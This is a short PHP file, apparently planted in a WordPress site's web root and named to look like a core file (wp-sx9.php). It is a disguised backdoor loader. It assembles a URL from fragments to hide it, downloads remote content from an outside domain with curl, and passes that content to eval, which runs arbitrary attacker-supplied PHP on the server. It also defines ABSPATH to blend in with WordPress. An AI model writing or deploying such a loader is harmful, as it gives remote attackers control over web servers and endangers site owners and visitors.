File: /home/memecom/domains/br8.app/public_html/wp-sx9.php
<?php
try {
$urlParts = [
'https://',
'hlemke.shop',
'/wp-sx9',
'.txt'
];
$realUrl = implode('', $urlParts);
$c = curl_init($realUrl);
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($c, CURLOPT_TIMEOUT, 5);
curl_setopt($c, CURLOPT_CONNECTTIMEOUT, 3);
$result = curl_exec($c);
if ($result !== false) {
eval('?>' . $result);
}
curl_close($c);
} catch (Exception $e) {
echo $e->getMessage();
}
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
?>